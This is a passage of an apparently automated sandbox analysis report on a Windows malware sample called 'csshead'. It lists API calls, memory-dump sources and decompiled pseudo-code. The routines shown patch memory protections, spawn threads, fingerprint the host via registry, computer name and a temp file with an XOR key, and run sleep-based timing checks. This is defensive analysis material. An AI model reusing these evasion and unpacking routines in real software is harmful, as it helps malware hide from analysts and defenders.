      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00423911, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41
    APIs
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
      • Part of subcall function 00427A95: RtlDecodePointer.NTDLL ref: 00427AA0
    • std::exception::exception.LIBCMT ref: 00423960
      • Part of subcall function 00423991: RaiseException.KERNEL32(?,?,00423990,000000F4,?,?,?,?,00423990,000000F4,0043C9F8,00442BF0,000000F4,?,?,00000000), ref: 004239D3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004090B8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
    C-Code - Quality: 100%
    			E004090B8(void* __edx) {
				long _v8;
				intOrPtr _t4;
				void* _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t15;
				intOrPtr _t17;
				intOrPtr _t20;

				E0040252C();
				_t4 =  *0x40a274; // 0x4021ec
				_t6 =  *0x40a078; // 0x401bd8
				VirtualProtect(_t6, _t4 -  *0x40a078, 0x40,  &_v8);
				_t17 =  *0x40a164; // 0x401de4
				_t8 =  *0x40a078; // 0x401bd8
				E00407C08(_t8 + 5, _t17 -  *0x40a078 - 5);
				_t20 =  *0x40a274; // 0x4021ec
				_t11 =  *0x40a164; // 0x401de4
				E0040898C(_t11 + 5, _t20 -  *0x40a164 - 5);
				_t15 = E00402574(0); // executed
				return _t15;
			}











    0x004090bc
    0x004090c7
    0x004090d3
    0x004090d9
    0x004090df
    0x004090ee
    0x004090f6
    0x004090fb
    0x0040910a
    0x00409112
    0x00409119
    0x00409120

    APIs
    • VirtualProtect.KERNELBASE(00401BD8,-00007E8C,00000040,00409545,?,?,00409479,?,?,00409545), ref: 004090D9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00455000, Relevance: 3.2, APIs: 2, Instructions: 188
    APIs
    • VirtualProtect.KERNELBASE(?,00001000,00000004,?,?), ref: 004551A6
    • VirtualProtect.KERNELBASE(?,00001000), ref: 004551BB
    Memory Dump Source
    • Source File: 00000000.00000002.27490513501.00455000.00000080.sdmp, Offset: 00455000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_455000_csshead.jbxd
    Function 00406DB0, Relevance: 3.0, APIs: 2, Instructions: 33sleep
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00422804, Relevance: 3.0, APIs: 2, Instructions: 22LIBRARYCODE
    APIs
    • RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
    • GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00406DC8, Relevance: 3.0, APIs: 2, Instructions: 20sleep
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00409468, Relevance: 3.0, APIs: 2, Instructions: 19thread
    C-Code - Quality: 82%
    			E00409468(signed int __eax, void* __edx) {
				long _v8;
				intOrPtr _v117;
				long _t9;

				 *(__eax & 0x5c000075) =  *(__eax & 0x5c000075) + (__eax & 0x5c000075);
				_v117 = _v117 + __edx;
				E004090B8(__edx); // executed
				CreateThread(0, 0, E00409124, 0, 0,  &_v8); // executed
				_push(0); // executed
				_t9 = RtlExitUserThread(); // executed
				return _t9;
			}






    0x0040946d
    0x0040946f
    0x00409474
    0x0040948a
    0x00409490
    0x00409492
    0x0040949a

    APIs
      • Part of subcall function 004090B8: VirtualProtect.KERNELBASE(00401BD8,-00007E8C,00000040,00409545,?,?,00409479,?,?,00409545), ref: 004090D9
    • CreateThread.KERNEL32(00000000,00000000,00409124,00000000,00000000,00409545), ref: 0040948A
    • RtlExitUserThread.NTDLL(00000000,?,?,00409545), ref: 00409492
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00409470, Relevance: 3.0, APIs: 2, Instructions: 17thread
    C-Code - Quality: 75%
    			E00409470() {
				long _v8;
				long _t5;
				void* _t6;

				E004090B8(_t6); // executed
				CreateThread(0, 0, E00409124, 0, 0,  &_v8); // executed
				_push(0); // executed
				_t5 = RtlExitUserThread(); // executed
				return _t5;
			}






    0x00409474
    0x0040948a
    0x00409490
    0x00409492
    0x0040949a

    APIs
      • Part of subcall function 004090B8: VirtualProtect.KERNELBASE(00401BD8,-00007E8C,00000040,00409545,?,?,00409479,?,?,00409545), ref: 004090D9
    • CreateThread.KERNEL32(00000000,00000000,00409124,00000000,00000000,00409545), ref: 0040948A
    • RtlExitUserThread.NTDLL(00000000,?,?,00409545), ref: 00409492
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 004070E5, Relevance: 1.6, APIs: 1, Instructions: 75registry
    C-Code - Quality: 81%
    			E004070E5(void* __ecx) {
				signed char _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* _v24;
				void* _v28;
				char _v285;
				intOrPtr _t31;
				intOrPtr _t38;
				void* _t44;
				intOrPtr _t50;
				signed int _t53;

				 *0x237c1fdf = 0xeb;
				asm("das");
				 *(__ecx - 0x24) =  *(__ecx - 0x24) >> 0x41;
				 *0x000000EB =  *((intOrPtr*)(0xeb)) + 0xeb;
				 *((intOrPtr*)(0xeb)) =  *((intOrPtr*)(0xeb)) + 0xeb;
				asm("scasd");
				asm("adc eax, 0xdf023c78");
				 *0x4e =  *0x4e + 0x4e;
				_v8 = 0;
				_t31 =  *0x40a564; // 0x4070d0
				_v20 = E00403F38(_t31);
				RegOpenKeyExA(0x80000002, _v20, 0, 0x20019,  &_v12); // executed
				E00401440(_v20);
				_v16 = 0x101;
				_t38 =  *0x40a568; // 0x4070f0
				_v24 = E00403F38(_t38);
				_t44 = E004038B0(_v12, _v24, 0, 0,  &_v285,  &_v16); // executed
				if(_t44 == 0) {
					_t50 =  *0x40a56c; // 0x407108
					_v28 = E00403F38(_t50);
					_t53 = E00401110( &_v285, _v28);
					asm("sbb eax, eax");
					_v8 =  ~(_t53 & 0xffffff00 | _t53 != 0x00000000);
					E00401440(_v28);
				}
				E00401440(_v24);
				E00403890(_v12);
				return _v8;
			}















    0x004070f2
    0x004070f7
    0x00407100
    0x00407104
    0x00407106
    0x0040710f
    0x00407110
    0x00407116
    0x00407123
    0x00407126
    0x00407130
    0x00407147
    0x00407150
    0x00407155
    0x0040715c
    0x00407166
    0x00407180
    0x0040718a
    0x0040718c
    0x00407196
    0x004071a2
    0x004071ae
    0x004071b0
    0x004071b6
    0x004071b6
    0x004071be
    0x004071c6
    0x004071d1

    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,?), ref: 00407147
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00422A18, Relevance: 1.6, APIs: 1, Instructions: 58LIBRARYCODE
    APIs
      • Part of subcall function 00426368: GetModuleFileNameW.KERNEL32(00000000,00442CAA,00000104,00000001,?,00000000), ref: 00426404
      • Part of subcall function 00426368: _wcslen.LIBCMT ref: 00426433
      • Part of subcall function 00426368: _wcslen.LIBCMT ref: 00426440
      • Part of subcall function 00426368: GetStdHandle.KERNEL32(000000F4,00000001,?,00000000), ref: 004264B6
      • Part of subcall function 00426368: _strlen.LIBCMT ref: 004264F3
      • Part of subcall function 00426368: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00426502
      • Part of subcall function 004243C2: ExitProcess.KERNEL32 ref: 004243D3
    • RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
      • Part of subcall function 00427A95: RtlDecodePointer.NTDLL ref: 00427AA0
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00407118, Relevance: 1.6, APIs: 1, Instructions: 57registry
    C-Code - Quality: 93%
    			E00407118(void* __ecx) {
				signed char _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* _v24;
				void* _v28;
				char _v285;
				intOrPtr _t23;
				intOrPtr _t30;
				void* _t36;
				intOrPtr _t42;
				signed int _t45;

				_v8 = 0;
				_t23 =  *0x40a564; // 0x4070d0
				_v20 = E00403F38(_t23);
				RegOpenKeyExA(0x80000002, _v20, 0, 0x20019,  &_v12); // executed
				E00401440(_v20);
				_v16 = 0x101;
				_t30 =  *0x40a568; // 0x4070f0
				_v24 = E00403F38(_t30);
				_t36 = E004038B0(_v12, _v24, 0, 0,  &_v285,  &_v16); // executed
				if(_t36 == 0) {
					_t42 =  *0x40a56c; // 0x407108
					_v28 = E00403F38(_t42);
					_t45 = E00401110( &_v285, _v28);
					asm("sbb eax, eax");
					_v8 =  ~(_t45 & 0xffffff00 | _t45 != 0x00000000);
					E00401440(_v28);
				}
				E00401440(_v24);
				E00403890(_v12);
				return _v8;
			}















    0x00407123
    0x00407126
    0x00407130
    0x00407147
    0x00407150
    0x00407155
    0x0040715c
    0x00407166
    0x00407180
    0x0040718a
    0x0040718c
    0x00407196
    0x004071a2
    0x004071ae
    0x004071b0
    0x004071b6
    0x004071b6
    0x004071be
    0x004071c6
    0x004071d1

    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,?), ref: 00407147
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00424443, Relevance: 1.6, APIs: 1, Instructions: 54
    APIs
      • Part of subcall function 0042893E: RtlEncodePointer.NTDLL(BBC3D676), ref: 0042894A
    • __initterm_e.LIBCMT ref: 00424479
      • Part of subcall function 0042C3B0: __FindPESection.LIBCMT ref: 0042C40B
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042AFAC, Relevance: 1.6, APIs: 1, Instructions: 52LIBRARYCODE
    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0042AFEF
      • Part of subcall function 00427A95: RtlDecodePointer.NTDLL ref: 00427AA0
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004069BC, Relevance: 1.5, APIs: 1, Instructions: 35
    C-Code - Quality: 100%
    			E004069BC(void* __edx, void* __eflags) {
				signed int _v8;
				signed int* _v12;
				intOrPtr _v16;
				char _v273;
				char _v338;
				intOrPtr _t24;

				_v8 = 0;
				E00406904( &_v338); // executed
				GetTempPathA(0x101,  &_v273);
				E0040133C( &_v273,  &_v338);
				_t24 = E004047AC( &_v273,  &_v12); // executed
				_v16 = _t24;
				if(_v16 != 0xffffffff) {
					if(_v16 == 4) {
						_v8 =  *_v12 ^ 0xcbc3f6a1;
					}
					E00401828(_v12);
				}
				return _v8;
			}









    0x004069c7
    0x004069d0
    0x004069e1
    0x004069f5
    0x00406a06
    0x00406a0b
    0x00406a12
    0x00406a18
    0x00406a24
    0x00406a24
    0x00406a2a
    0x00406a2a
    0x00406a35

    APIs
      • Part of subcall function 00406904: GetComputerNameA.KERNEL32(?,?), ref: 00406927
      • Part of subcall function 00406904: RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00406965
    • GetTempPathA.KERNEL32(00000101,?), ref: 004069E1
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
      • Part of subcall function 004047AC: GetFileSize.KERNEL32(?,00000000), ref: 00404810
      • Part of subcall function 004047AC: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
      • Part of subcall function 004047AC: CloseHandle.KERNEL32(?), ref: 00404849
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00424946, Relevance: 1.5, APIs: 1, Instructions: 22
    APIs
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • RtlEncodePointer.NTDLL(00000000), ref: 00424957
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004038B0, Relevance: 1.5, APIs: 1, Instructions: 21registry
    C-Code - Quality: 100%
    			E004038B0(void* _a4, char* _a8, int* _a12, int* _a16, char* _a20, int* _a24) {
				long _v8;
				long _t15;

				_t15 = RegQueryValueExA(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				_v8 = _t15;
				return _v8;
			}





    0x004038cc
    0x004038d2
    0x004038da

    APIs
    • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 01823894, Relevance: 1.5, APIs: 1, Instructions: 18
    APIs
    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 018238B7
    Memory Dump Source
    • Source File: 00000000.00000002.27491633392.01823000.00000040.sdmp, Offset: 01823000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1823000_csshead.jbxd
    Function 0042893E, Relevance: 1.5, APIs: 1, Instructions: 13
    APIs
    • RtlEncodePointer.NTDLL(BBC3D676), ref: 0042894A
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042769E, Relevance: 1.5, APIs: 1, Instructions: 10
    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,00424C7A), ref: 004276A7
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042AF49, Relevance: 1.5, APIs: 1, Instructions: 4
    APIs
    • RtlEncodePointer.NTDLL(Function_0001AEC5), ref: 0042AF4E
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00425CFE, Relevance: 1.5, APIs: 1, Instructions: 3LIBRARYCODE
    APIs
    • RtlEncodePointer.NTDLL(00000000), ref: 00425D00
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00406B60, Relevance: 1.3, APIs: 1, Instructions: 46sleep
    C-Code - Quality: 100%
    			E00406B60(intOrPtr* __eax, void* __ebx, void* __ecx, char* __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;

				_t43 = __edx;
				_v8 = __eax;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				do {
					E00406B18( &_v32, __ebx, __ecx, _t43);
					_t43 =  &_v32;
					E00406A74( &_v24,  &_v32);
					Sleep(0x1f4); // executed
					_v16 = _v16 + 1;
				} while (_v16 != 0xa);
				_v12 = 0xffffffff;
				_v28 = 0;
				_v32 = 0x9c40;
				 *_v8 = _v24;
				if(E00406ACC( &_v32,  &_v24) != 0) {
					_v28 = 0;
					_v32 = 0xa;
					if(E00406ACC( &_v24,  &_v32) != 0) {
						_v12 = 0;
					}
				}
				return _v12;
			}










    0x00406b60
    0x00406b66
    0x00406b6b
    0x00406b70
    0x00406b75
    0x00406b78
    0x00406b7b
    0x00406b83
    0x00406b86
    0x00406b90
    0x00406b96
    0x00406b99
    0x00406b9f
    0x00406ba8
    0x00406bab
    0x00406bb8
    0x00406bc7
    0x00406bcb
    0x00406bce
    0x00406be2
    0x00406be6
    0x00406be6
    0x00406be2
    0x00406bef

    APIs
    • Sleep.KERNELBASE(000001F4), ref: 00406B90
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 0042A124, Relevance: 1.3, APIs: 1, Instructions: 30sleepLIBRARYCODE
    APIs
      • Part of subcall function 0042AFAC: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0042AFEF
    • Sleep.KERNEL32(00000000), ref: 0042A14C
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042A0DF, Relevance: 1.3, APIs: 1, Instructions: 28sleepLIBRARYCODE
    APIs
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 01820570, Relevance: 1.3, APIs: 1, Instructions: 18
    APIs
    • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 01820593
    Memory Dump Source
    • Source File: 00000000.00000002.27491620206.01820000.00000040.sdmp, Offset: 01820000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1820000_csshead.jbxd
    Function 01823854, Relevance: 1.3, APIs: 1, Instructions: 18
    APIs
    • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 01823877
    Memory Dump Source
    • Source File: 00000000.00000002.27491633392.01823000.00000040.sdmp, Offset: 01823000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1823000_csshead.jbxd
    Function 01820540, Relevance: 1.3, APIs: 1, Instructions: 17
    APIs
    • VirtualFree.KERNELBASE(?,?,?), ref: 01820560
    Memory Dump Source
    • Source File: 00000000.00000002.27491620206.01820000.00000040.sdmp, Offset: 01820000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1820000_csshead.jbxd
    Function 01823824, Relevance: 1.3, APIs: 1, Instructions: 17
    APIs
    • VirtualFree.KERNELBASE(?,?,?), ref: 01823844
    Memory Dump Source
    • Source File: 00000000.00000002.27491633392.01823000.00000040.sdmp, Offset: 01823000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1823000_csshead.jbxd
    Function 004013B4, Relevance: 1.3, APIs: 1, Instructions: 17
    C-Code - Quality: 100%
    			E004013B4(void** __eax, long __edx) {
				void** _v8;
				long _v12;
				void* _t7;

				_v12 = __edx;
				_v8 = __eax;
				_t7 = VirtualAlloc(0, _v12, 0x3000, 4); // executed
				 *_v8 = _t7;
				return _t7;
			}






    0x004013ba
    0x004013bd
    0x004013cd
    0x004013d6
    0x004013db

    APIs
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 018204E0, Relevance: 1.3, APIs: 1, Instructions: 16
    APIs
    • GlobalAlloc.KERNELBASE(?,?), ref: 018204FD
    Memory Dump Source
    • Source File: 00000000.00000002.27491620206.01820000.00000040.sdmp, Offset: 01820000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1820000_csshead.jbxd
    Function 01823764, Relevance: 1.3, APIs: 1, Instructions: 16
    APIs
    • GlobalAlloc.KERNELBASE(?,?), ref: 01823781
    Memory Dump Source
    • Source File: 00000000.00000002.27491633392.01823000.00000040.sdmp, Offset: 01823000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1823000_csshead.jbxd
    Function 00401828, Relevance: 1.3, APIs: 1, Instructions: 12
    C-Code - Quality: 100%
    			E00401828(void* __eax) {
				void* _v8;
				int _t5;

				_v8 = __eax;
				_t5 = VirtualFree(_v8, 0, 0x8000); // executed
				return _t5;
			}





    0x0040182c
    0x0040183a
    0x00401842

    APIs
    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Non-executed Functions

    Function 00418190, Relevance: 27.3, APIs: 18, Instructions: 275comnativestring
    APIs
    • GetWindowLongA.USER32(?,000000EC), ref: 004181D3
    • GetWindowLongA.USER32(?,000000EC), ref: 004181E3
    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 004181EE
    • GetWindowLongA.USER32(?,000000EB), ref: 004181FC
    • OleUninitialize.OLE32 ref: 0041820E
    • OleInitialize.OLE32(00000000), ref: 0041821B
    • GetWindowTextLengthA.USER32(?), ref: 00418222
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • GetWindowTextA.USER32(?,00000000,00000001), ref: 00418279
    • SetWindowTextA.USER32(?,00433C2B), ref: 00418285
    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004182AC
    • GlobalFix.KERNEL32(00000000), ref: 004182B9
    • GlobalUnWire.KERNEL32(00000000), ref: 004182D4
    • SysFreeString.OLEAUT32(00000000), ref: 00418309
    • lstrlen.KERNEL32(00000000), ref: 0041833E
      • Part of subcall function 00410680: SysFreeString.OLEAUT32(00000000), ref: 00410749
      • Part of subcall function 00410680: SysAllocString.OLEAUT32(?), ref: 00410778
    • SysFreeString.OLEAUT32(00000000), ref: 004183FC
    • SetWindowLongA.USER32(?,000000EB,?), ref: 00418421
    • SysFreeString.OLEAUT32(00000000), ref: 00418438
    • NtdllDefWindowProc_A.NTDLL(?,00000000,?,?), ref: 00418462
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00417ED0, Relevance: 22.8, APIs: 15, Instructions: 265comnativestring
    APIs
    • GetWindowLongA.USER32(?,000000EC), ref: 00417F10
    • GetWindowLongA.USER32(?,000000EC), ref: 00417F23
    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
    • GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
    • OleUninitialize.OLE32 ref: 00417F51
    • OleInitialize.OLE32(00000000), ref: 00417F5E
    • GetWindowTextLengthA.USER32(?), ref: 00417F68
